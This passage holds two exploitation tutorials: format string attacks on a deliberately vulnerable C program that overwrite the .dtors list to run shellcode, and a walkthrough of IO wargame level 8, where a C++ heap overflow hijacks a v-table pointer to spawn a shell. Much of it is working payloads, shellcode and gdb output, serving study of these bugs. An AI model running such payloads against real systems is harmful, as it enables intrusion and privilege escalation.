Format String Vulnerabilities

In many programming languages, the preferred way to deal with printing strings is through the use of format strings.  Format strings allow for the parsing of strings containing an arbitrary number of mixed data type parameters.  However, due to implementation details in certain languages such as C and C++, certain uses of functions which rely on format strings may make programs vulnerable to exploits.  This type of vulnerability can lead to exploitation which reads arbitrary memory locations, or even writes to arbitrary memory locations (such as the return address).  As such, format string vulnerabilities are an important security concern and should be something which all programmers watch out for.

To better understand format strings, let’s take a look at a sample program that makes use of format strings.  The program we’re going to look at is simple: it has one 512-byte character array called buf, and upon running it uses strncpy to copy up to the first 511 bytes of argv[1] into buf.  After strncpy has finished, printf is called on buf, and finally the program returns 0.  Here’s the code:

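#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buf[512];

    /* Copy at most 511 bytes; argv[1] is assumed to be present. */
    strncpy(buf, argv[1], sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';  /* strncpy does not terminate on truncation */

    /* Deliberately vulnerable: buf is used as the format string. */
    printf(buf);

    return 0;
}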

Looking at the code, it should be clear that printf is the function which makes use of format strings.  In this use, printf(buf), buf is treated as a format string.  Format strings are evaluated with a special format function.  This function parses the string passed to it, and replaces certain control characters with variables from the stack.  For example, if one wanted to print the value of the integer variable i, they might use the following:

printf("Value of integer i: %d", i);

Format string control characters are actually sets of characters, but they all start with a %.  Since the format function needs to be able to parse format strings with any number of control characters, it simply assumes each control character belongs to a parameter which was passed via the stack.  While this assumption holds true in examples such as the integer printing example above, it doesn’t always hold in situations such as that in our program using printf(buf).  Our printf(buf) example will work fine, and the string contents of buf will be printed to the screen, under one condition.  This condition is that the string buf does not contain anything which might be interpreted as a control character.  If buf does contain control characters, the format function will treat them as valid control characters and perform the corresponding action such as reading an integer from the stack.  This ends up being a security vulnerability in that format strings allow for both reading and writing data, and if the stack hasn’t been initialized in the manner expected given the format string/control characters, then the data read/written can end up being arbitrary and end up causing unintended results.

To see an example of this vulnerability, let’s attempt to run our program and cause it to print the hex values held at the start of our string.  To do this, let’s first look at the stack.  Prior to printf being called, the “top” of the stack looks roughly like this:

[buf][sfp][ra][argc][argv]

From here printf will be called, which places more data on the top of the stack, so we’ll have to step past a bit of data before we reach our string.  To step through values on the stack, we can use the %x control character.  Each %x reads the next 32-bit value from the stack and prints it as unsigned hex.  So, let’s make a few attempts at running the program with format control characters to read hex values from the stack:

s9ghost@localhost:/tmp/.fsv$ ./test AAAABBBB.%x.%x.%x.%x.%x.%x.%x.%x
AAAABBBB.bfffde8d.1ff.10.7.bfffdae8.b29ce5.41414141.42424242

What is all this?  As we said, we have to use a few extra reads to move through the data placed on the stack by the call to printf.  However, on the 7th and 8th reads we found hex values which correspond to the AAAABBBB sequence at the start of our string.  The deeper reason we’re able to read the value there is that the control character %x expects a 32-bit int, which would have been passed by value on the stack.  Other control characters, such as %s, which prints a null-terminated string, behave slightly differently.  Since strings aren’t passed by value but by reference, the value on the stack is a pointer to a string.  Thus, if we use the control character %s, the value on the stack will be used as a pointer, and the string will be read from that location.  This gives us another way to read from memory, and in fact lets us read strings from any arbitrary memory location if we can control what is next on the stack.

Well, since in the above example we were able to use %x to move to the start of our format string, let’s try writing a valid memory location at the start of our string and use the %s control character to de-reference that location and print the string stored there.  First, though, we need a memory location that’ll work.  For this exercise let’s assume we have the following string at 0xbfffdeb0: “TERM=xterm”.  Next, we can write the address in little-endian due to our architecture.

s9ghost@localhost:/tmp/.fsv$ ./test `perl -e 'print "\xb0\xde\xff\xbf","AAAABBBB.%x.%x.%x.%x.%x.%x.%s"'`
°Þÿ¿AAAABBBB.bfffde8c.1ff.10.7.bfffdae8.2c0ce5.RM=xterm

Now you can see that by using %x to advance to our provided string on the stack, placing an address at the front of that string, and using a control character which de-references, we can read from any arbitrary memory location.  However, format strings contain even more control characters than the ones we’ve seen here.  Specifically, the %n control allows writing to a variable, and it is through this that format string vulnerabilities can also result in writing to arbitrary memory locations.

The %n control character is used to store the number of characters written so far into a variable.  Like all control characters, it uses a value from the stack; however, since it stores an int into a variable, it expects the address of that variable to be on the stack.  Thus, since we know we can supply values to the stack, if we can also control how many characters have been written, we might be able to overwrite an important area of memory.  The careful thinker may have picked up on something at this point:  If we need to write more to increase the value we’ll store with %n, won’t that move us past our stack location if we need to use more %x or any other read control?  While this is true, writing and reading aren’t the same.  Specifically, the %x control allows for formatting options, such as padding, which will write extra characters regardless of what was read.  To pad a number, we simply tell %x how many characters we want the result to be.  As an example, let’s look at this modified use of the %x control character.

s9ghost@localhost:/tmp/.fsv$ ./test `perl -e 'print "\xb0\xde\xff\xbf","AAAABBBB.%x.%x.%05x.%05x.%x."'`
°Þÿ¿AAAABBBB.bfffde8d.1ff.00010.00007.bfffdae8.

Looking at the 3rd and 4th %x, we can see the addition of 05.  The leading 0 designates that the value printed will be zero-padded, and the 5 specifies that at least 5 characters will be printed.  The result is seen in the “00010” and “00007” that were printed instead of simply “10” and “7” as in the previous example without the padding options.  Thus, it is through this zero-padding that we can increase the number of bytes printed without using additional control characters and consuming more of the stack.  Now let’s attempt to re-write some memory.  Let’s assume we’ve found the following memory location containing the following string:

(gdb) x/1s 0xbfffdedf
0xbfffdedf: "example=aaaa"
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61

To write to memory, our format string starts out similar to the one used for reading.  In fact, let’s read first, just to make sure we’re positioned correctly on the stack:

s9ghost@localhost:/tmp/.fsv$ ./test `perl -e 'print "\xd1\xde\xff\xbf","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%s"'`
ßÞÿ¿AAAABBBB.bfffde7b.1ff.00010.00007.bfffdac8.51ece5.example=aaaa

So far, so good.  Now if we use the %n control character instead of %s, we should be able to write to the address on the stack instead of reading from it.  Let’s go ahead and do that using gdb, so that we can place breakpoints before and after printf to pause the program and check the values in memory to verify our results:

(gdb) run `perl -e 'print "\xd9\xde\xff\xbf","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/12xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x36 0x00 0x00 0x00
(gdb) cont
Continuing.

ÙÞÿ¿AAAABBBB.bfffde6d.1ff.00010.00007.bfffdaa8.ec5ce5.
Program exited normally.

At this point we’ve proven that we can write to a specific memory address.  We also know we can pad some of our reads to change the value we write to memory.  However, how well would this work if we wanted to write, say, the memory address of some shellcode to an arbitrary memory location (like the return address or some other place that will later be executed)?  If we wanted to write an address such as 0xbfffa00a with a single %n, we would first need to print 0xbfffa00a characters, which is roughly 3.2 billion characters of padding.  This is far too large to be practical.  What we can do instead is chain together four small writes, each setting one byte, to build up the address.

To chain together writes, we’re going to have to place four memory locations onto the stack via our format string.  We must also, obviously, supply additional %n control characters.  Let’s check out an example:

(gdb) run `perl -e 'print "\xd9\xde\xff\xbf", "\xda\xde\xff\xbf", "\xdb\xde\xff\xbf", "\xdc\xde\xff\xbf", "AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x61 0x61 0x61 0x61 0x00 0x53 0x53 0x48
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/16xb 0xbfffded1
0xbfffded1: 0x65 0x78 0x61 0x6d 0x70 0x6c 0x65 0x3d
0xbfffded9: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x48

Now we’ve seen that we can control a full 32 bits of memory.  The theory and details of format string vulnerabilities have been verified.  However, to show the severity of format string vulnerabilities, let’s see if we can cause arbitrary code execution.

To cause code execution, we’re going to have to overwrite some area of memory with the address of the code we want executed.  While we could potentially try to write to the return address in the stack frame, another option is to take advantage of how GCC handles constructors and destructors.  Binaries built with the GCC toolchain of this era, whether they define any constructor or destructor functions or not, contain constructor and destructor lists (the .ctors and .dtors sections).  If a program doesn’t specify its own, these lists remain empty.  The destructor list holds pointers to destructor functions, which are called as the program exits.  Thus, if we want to cause code execution, we can do it by writing the address of the code we want to execute at the end of the destructor list, and it will be run when the destructors are called.  To write to the end of the destructor list, we’re going to need to know where it is.  Luckily we can check this with the nm command as follows:

s9ghost@localhost:/tmp/.fsv$ nm ./test | grep DTOR
08049510 D __DTOR_END__
0804950c d __DTOR_LIST__

Since we need to write to the end of the list, we need to write to memory location 0x08049510.  Let’s use that address as a base, and see if we can construct a format string which will overwrite it, similar to what we did above.  Then let’s hit our breakpoints and examine the memory location to make sure it worked.

(gdb) run `perl -e 'print "\x10\x95\x04\x08", "\x11\x95\x04\x08", "\x12\x95\x04\x08", "\x13\x95\x04\x08", "AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%n.%n.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x42 0x43 0x44 0x45 0x00 0x00 0x00 0x00

Now that we’ve got our format string overwriting the DTOR list, the final thing we need to do is determine how to make our string write the values which represent the address of our arbitrary code.  However, before doing that, we need to place some code into memory.  Let’s use some Linux shellcode we got from packetstorm which will spawn a shell.  Let’s also pad it with many no-ops (NOPs) at the beginning so we can be a little more lenient about which memory address we choose.  (This is just for ease; it’s not necessary, and it’s probably not a good idea in real environments, since NOP padding may trigger an IDS.)  To place our shellcode in memory, we can assign it to an environment variable; we’ll use the variable SHELLCODE.

s9ghost@localhost:/tmp/.fsv$ export SHELLCODE=`perl -e 'print "\x90"x5000,"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

Now that our shellcode is placed in memory, let’s write a small C program to get the address of the environment variable holding our shellcode.  This program and its use are shown next:

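#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    if (argc < 2)
        exit(1);

    /* Print the address of the named environment variable's value
       (a null pointer if the variable is not set). */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}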

s9ghost@localhost:/tmp/.fsv$ ./getmem SHELLCODE
bfffcaf8

Now we have our code in memory, and we know where in memory it is.  So if we can jump to any memory location in the NOP padding of our shellcode, which occupies the first 5000 bytes starting at 0xbfffcaf8, we should be able to execute our shellcode.

Finally, let’s determine how much padding we need to write between uses of %n to correctly overwrite DTOR with the memory location of our shellcode.  Remember that addresses are stored in memory in little-endian format, so the least significant byte comes first, at the lowest address.  First, let’s re-write our format string, adding %x controls between our %n’s so we can change the value written by each.  (The “abcd” strings placed between the addresses give each of those extra %x controls a dummy value to consume.)  We should also see what value is written by each %n and how much we need to alter the padding to get the results we want:

(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%08x.%n.%08x.%n.%08x.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0x58 0x62 0x6c 0x00 0x00 0x00 0x00

DTOR was correctly overwritten.  Let’s look at the values.  Since we have a large range of NOPs to jump into, we can leave the first value, 0x4e, alone, as it’s the least significant byte.  However, based on the memory address we want to jump to, we’re going to have to change the second byte.  Since we want to land somewhere in the 5000 bytes above 0xbfffcaf8, let’s just try for 0xcb in the second byte of DTOR.  To do this, we’re going to have to pad the difference between the value currently written, 0x58, and the value we want, 0xcb.  Doing some math we see that 0xcb - 0x58 = 0x73, which is 115 decimal.  Also, since we already had a width of 8 there, let’s add 8 more for a final padding width of 123.  Let’s attempt this and check the value written again to make sure it works:

(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/.fsv/test `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%08x.%n.%08x.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xd5 0xdf 0x00 0x00 0x00 0x00

As you can see, it’s working.  We’ve now written 0xcb to the second byte of DTOR.  Next, we want to write 0xff to the third byte.  Let’s take the same approach as before.  With the math, 0xff - 0xd5 = 0x2a, which is 42 decimal, and again we add 8 for what we already padded, for a final padding of 50.  Let’s test it again:

(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/.fsv/test `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%08x.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/8xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0x09 0x01 0x00 0x00 0x00

Alright, one more byte to go.  As you can see, the value of each later byte shifts as we change the padding before it.  The most recent value for the 4th byte is now 0x09 (the count has passed 0xff, and only its low byte lands here).  Let’s do our math again: 0xbf - 0x09 = 0xb6, which is 182 decimal, and adding 8 more for the previous padding gives 190 total padding.  Let’s put this in, check our values, and see what happens when the program finishes:

(gdb) run `perl -e 'print "\x10\x95\x04\x08","abcd","\x11\x95\x04\x08","abcd","\x12\x95\x04\x08","abcd","\x13\x95\x04\x08","AAAABBBB.%x.%x.%05x.%05x.%x.%x.%n.%0123x.%n.%050x.%n.%0190x.%n"'`

Breakpoint 1, 0x080483f7 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x00 0x00 0x00 0x00
(gdb) cont
Continuing.

Breakpoint 2, 0x08048437 in main ()
(gdb) x/4xb 0x08049510
0x8049510 <__DTOR_END__>: 0x4e 0xcb 0xff 0xbf
(gdb) cont
Continuing. abcabcabcAAAABBBB.bfffca89.1ff.00010.00007.bfffc6c8.5d9ce5..000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261..00000000000000000000000000000000000000000064636261..0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064636261.
sh-4.1$

There we have it, a format string exploited to provide a shell.

Over the years, the format string landscape has changed.  Many compilers now offer options to provide security against certain format string attacks, such as DTOR.  However, other ways of exploiting format string vulnerabilities exist and continue to be developed.  We will talk about other format string exploit options, such as writing to PLT/GOT or a stack Return Address, in future postings.  Being able to read and write indiscriminately to and from memory is a major security flaw, and it is through this flaw that format string vulnerabilities make their mark on the computer security landscape.


IO Level 8 – Buffer/Heap Overflow in C++

Today we’re going to be looking at level 8 of the IO wargame, hosted on the Smash The Stack Network.  As always, the password at the end of the level will be stripped and replaced with Y’s.  So without further ado, let’s get started.  If you want to follow along at home (which I highly recommend), ssh into blowfish as level8 with the password from completing level 7.

Once logged in, let’s go ahead and see what files we’ll be working with today.  A quick ls of the /levels directory shows two files, level08 and level08.cpp.  This is neat, our first level in C++!  Why don’t we look at the source first:

level8@io:~$ more /levels/level08.cpp
// writen by bla for io.smashthestack.org
#include <iostream>
#include <cstring>

class Number
{
    public:
        Number(int x) : number(x) {}
        void setAnnotation(char *a) {memcpy(annotation, a, strlen(a));}
        virtual int operator+(Number &r) {return number + r.number;}
    private:
        char annotation[100];
        int number;
};

int main(int argc, char **argv)
{
    if(argc < 2) _exit(1);

    Number *x = new Number(5);
    Number *y = new Number(6);
    Number &five = *x, &six = *y;

    five.setAnnotation(argv[1]);

    return six + five;
}

Next, let’s focus on the Number class.  This class has two private member variables.  One is a char array called annotation, the other is an int called number.  The class also has three public member functions.  The first is the constructor, which takes one argument, an int, and assigns its value to the private member “number”.  The second function is called setAnnotation, and it takes a char pointer, “a”, as its only argument.  Finally, the third is a virtual overload of the + operator for the Number class.

Looking at the implementation of the setAnnotation function, we can see something that doesn’t look well programmed from a security perspective.  This function uses memcpy to copy the bytes starting at the memory location pointed to by “a”, the function’s argument, to the memory locations starting at “annotation”.  It uses the length of the string “a” as the number of bytes to copy.  The copy should have been limited by the size of “annotation”, not simply by the length of “a”.  Since we control a’s value, and therefore its length, we can overflow the annotation buffer and cause changes to the heap.

To get a good understanding of what’s happening in the program, let’s go ahead and load up gdb and disassemble main.  The following is main with line comments:

(gdb) disass main
Dump of assembler code for function main:
0x08048694 <main+0>: push %ebp
0x08048695 <main+1>: mov %esp,%ebp
0x08048697 <main+3>: and $0xfffffff0,%esp
0x0804869a <main+6>: push %ebx
0x0804869b <main+7>: sub $0x2c,%esp
0x0804869e <main+10>: cmpl $0x1,0x8(%ebp) –if(argc < 2)
0x080486a2 <main+14>: jg 0x80486b0 <main+28> —
0x080486a4 <main+16>: movl $0x1,(%esp) —
0x080486ab <main+23>: call 0x804857c <_exit@plt> — _exit(1);
0x080486b0 <main+28>: movl $0x6c,(%esp) –0x6c = 108
0x080486b7 <main+35>: call 0x80485bc <_Znwj@plt> –operator new(unsigned int): allocates 108 bytes for a Number (v-table pointer, annotation, number); this becomes C++ variable x
0x080486bc <main+40>: mov %eax,%ebx –save new address in ebx
0x080486be <main+42>: mov %ebx,%eax –reload to eax
0x080486c0 <main+44>: movl $0x5,0x4(%esp) –value 5 onto callstack as parameters
0x080486c8 <main+52>: mov %eax,(%esp) –address of number
0x080486cb <main+55>: call 0x804879e <_ZN6NumberC1Ei> –call constructor <Number::Number(int)>
0x080486d0 <main+60>: mov %ebx,0x10(%esp) –move old new operator address from ebx to stack
0x080486d4 <main+64>: movl $0x6c,(%esp) –put 108 at the top of the stack as the size argument for operator new
0x080486db <main+71>: call 0x80485bc <_Znwj@plt> –operator new(unsigned int): allocates 108 bytes for a Number (v-table pointer, annotation, number); this becomes C++ variable y
0x080486e0 <main+76>: mov %eax,%ebx –save new2 address in ebx
0x080486e2 <main+78>: mov %ebx,%eax –reload to eax
0x080486e4 <main+80>: movl $0x6,0x4(%esp) –value 6 onto callstack as parameters
0x080486ec <main+88>: mov %eax,(%esp) –new 2 address on callstack as parameters
0x080486ef <main+91>: call 0x804879e <_ZN6NumberC1Ei> –call constructor <Number::Number(int)>
0x080486f4 <main+96>: mov %ebx,0x14(%esp) –move old new2 operator address (memory address of new2) from ebx to stack (c++ variable y)
0x080486f8 <main+100>: mov 0x10(%esp),%eax –move old new address (c++ variable x) into eax
0x080486fc <main+104>: mov %eax,0x18(%esp) –move old new address from eax to the stack (assigning value to the reference variable five)
0x08048700 <main+108>: mov 0x14(%esp),%eax –move old new2 address (c++ variable y) into eax
0x08048704 <main+112>: mov %eax,0x1c(%esp) –move old new2 address from eax to the stack (assigning value to the reference variable six)
0x08048708 <main+116>: mov 0xc(%ebp),%eax –load address argv into eax
0x0804870b <main+119>: add $0x4,%eax –add 4 bytes to make up for argv[1] into array
0x0804870e <main+122>: mov (%eax),%eax —
0x08048710 <main+124>: mov %eax,0x4(%esp) –move char pointer of the first argument onto the stack
0x08048714 <main+128>: mov 0x18(%esp),%eax –load the address stored in the five variable into eax (its the address of our x structure in memory)
0x08048718 <main+132>: mov %eax,(%esp) –move the address from eax onto the stack
0x0804871b <main+135>: call 0x80487b6 <_ZN6Number13setAnnotationEPc> –Call to Number::setAnnotation(char*)
0x08048720 <main+140>: mov 0x1c(%esp),%eax –move address of six structure to eax
0x08048724 <main+144>: mov (%eax),%eax –dereference it: load the first 4 bytes of the six structure (the v-table pointer) into eax
0x08048726 <main+146>: mov (%eax),%edx –dereference the v-table pointer: load the first v-table entry into edx (it is called later, so it must be a function address)
0x08048728 <main+148>: mov 0x18(%esp),%eax –move address of five structure to eax
0x0804872c <main+152>: mov %eax,0x4(%esp) –move address of five as parameter on stack for call
0x08048730 <main+156>: mov 0x1c(%esp),%eax –move address of six structure into eax
0x08048734 <main+160>: mov %eax,(%esp) –move address of six as parameter on stack for call
0x08048737 <main+163>: call *%edx –call the address held in edx as a function
0x08048739 <main+165>: add $0x2c,%esp
0x0804873c <main+168>: pop %ebx
0x0804873d <main+169>: mov %ebp,%esp
0x0804873f <main+171>: pop %ebp
0x08048740 <main+172>: ret
End of assembler dump.

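So analyzing the above we can assume our stack frame looks like this, from lower to higher addresses (offsets for the locals are from esp, the rest are from ebp):

esp+0x10  esp+0x14  esp+0x18  esp+0x1c        ebp+0x0  ebp+0x4  ebp+0x8  ebp+0xc
[x]       [y]       [&five]   [&six]    ...   [sfp]    [ra]     [argc]   [argv]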

So let’s set a breakpoint at 0x0804871b (main+135), the call to Number::setAnnotation(char*), and check out the stack.

Breakpoint 1, 0x0804871b in main ()
(gdb) x/32xb $esp
0xbfffdca0: 0x08 0xa0 0x04 0x08 0x96 0xde 0xff 0xbf
0xbfffdca8: 0xd8 0xdc 0xff 0xbf 0x29 0x88 0x04 0x08
0xbfffdcb0: 0x08 0xa0 0x04 0x08 0x78 0xa0 0x04 0x08
0xbfffdcb8: 0x08 0xa0 0x04 0x08 0x78 0xa0 0x04 0x08

Looking at main’s assembly we can see that at this point in execution, esp+4 holds the address of the start of argv[1].  Also, esp holds the “this” pointer for the call, which is the address of the structure referred to by the variable five (0x0804a008).  The annotation array we’re going to write to starts 4 bytes past that, at 0x0804a00c.  The form of this address shows us that it isn’t in the same region of memory as all the 0xbfff---- addresses.  This 0x0804---- area, it turns out, is the heap.  The heap, like the stack, holds program data, but it is used when a program needs to allocate memory dynamically.  In our program today, that happened when the “new” operator was used to create two instances of the Number class, which is why they reside in the heap.

Examining the stack some more, we can find the values stored in both reference variables five and six.  They are located at +0x18 and +0x1c on the stack respectively from $esp.  Thus, we can see our Number instances are located at 0x0804a008 and 0x0804a078.  It is important to remember that with the heap, memory addresses grow up, unlike with the stack, which is why “six” is at a larger memory address than “five”.

Next, let’s go ahead and look at the memory that represents one of our instances.  Let’s check out instance “six”:

(gdb) x/108xb 0x0804a078
0x804a078: 0xc8 0x88 0x04 0x08 0x00 0x00 0x00 0x00
0x804a080: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a088: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a090: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a098: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0a0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0b0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0b8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0c0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0c8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x804a0e0: 0x06 0x00 0x00 0x00

There are three things to note about this memory.  Let’s start from the bottom and notice that the int value “number” is stored at the end (notice the int value 6).  Next we see the memory which is allocated for the 100 byte character array.  Finally, at the very top of the structure, we see 4 bytes which look an awful lot like a memory address.  The reason is because it is!  Let’s look at the address and see if we can tell what it is:

(gdb) disass 0x080488c8
Dump of assembler code for function _ZTV6Number:
0x080488c0 <_ZTV6Number+0>: add %al,(%eax)
0x080488c2 <_ZTV6Number+2>: add %al,(%eax)
0x080488c4 <_ZTV6Number+4>: aam $0xffffff88
0x080488c6 <_ZTV6Number+6>: add $0x8,%al
0x080488c8 <_ZTV6Number+8>: loop 0x8048851 <__libc_csu_init+65>
0x080488ca <_ZTV6Number+10>: add $0x8,%al

From the disassembly at this address it may not be directly clear what it is (gdb is decoding data as if it were instructions).  But looking at how it’s used in main, we can discern that it is the virtual table (v-table) for the virtual functions of the Number class.  Also, looking back at the assembly of main, we can see that the virtual table accessed is that of the “six” structure.  Since the buffer we can overflow is that of “five”, if we overwrite the bytes in the “six” structure which point to the virtual table with the address of a function we want to execute, we should be able to hijack execution. (Almost.  Since the v-table adds another level of links, we’ll have to add another level of de-referencing.)

So, counting up the memory locations, we can see that there are 108 bytes between the start of “annotation” in “five” and the start of the “six” structure, where the v-table pointer is.  Thus, we’ll need to overflow the annotation buffer with 108 bytes, then 4 more bytes to overwrite the v-table pointer of “six”.  To make sure this is correct, let’s test it in gdb and drop a breakpoint to check the values again:

(gdb) run `perl -e 'print "A"x108,"BBBB"'`
Starting program: /levels/level08 `perl -e 'print "A"x108,"BBBB"'`

Breakpoint 1, 0x08048724 in main ()
(gdb) i r
eax 0x804a078 134520952
ecx 0x0 0
edx 0x0 0
ebx 0x804a078 134520952
esp 0xbfffdc30 0xbfffdc30
ebp 0xbfffdc68 0xbfffdc68
esi 0x0 0
edi 0x0 0
eip 0x8048724 0x8048724 <main+144>
eflags 0x200202 [ IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/8xb 0x0804a078
0x804a078: 0x42 0x42 0x42 0x42 0x00 0x00 0x00 0x00

Perfect.  Now we just need to overwrite this pointer with a valid memory location, perhaps that of some shellcode.  Since we know the address of the annotation buffer in five, let’s try hosting our shellcode there.

(gdb) run `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x56,"\x10\xa0\x04\x08"'`

Starting program: /levels/level08 `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x56,"\x10\xa0\x04\x08"'`

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()

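Whoops, not quite right.  We forgot about the extra dereference for the v-table: the program loads the v-table pointer from “six”, then loads a function address from the location it points to, and only then makes the call.  To make up for that, we can replace the first 4 NOPs of our string with the address 4 bytes deeper in the NOP padding (0x0804a010), using them as a fake v-table entry instead of part of the sled, and overwrite the v-table pointer of “six” with the address of the start of our string (0x0804a00c).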

(gdb) run `perl -e ‘print “\x10\xa0\x04\x08\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”,”A”x56,”\x0c\xa0\x04\x08″‘`
Starting program: /levels/level08 `perl -e ‘print “\x10\xa0\x04\x08\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”,”A”x56,”\x0c\xa0\x04\x08″‘`

Executing new program: /bin/bash
sh-4.1$
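The extra dereference is easier to see in a simplified model.  The sketch below is plain C, not the level’s actual C++ code: the names object, method_fn, call_first_virtual, and demo_vtable_swap are made up for illustration, and a real compiler’s object layout has more to it.  It only shows that a virtual call first loads the table pointer from the object and then loads the function address from that table, so whatever we write over the table pointer has to point at memory that itself holds an address.

```c
/* Hypothetical stand-in for a virtual method. */
typedef int (*method_fn)(void);

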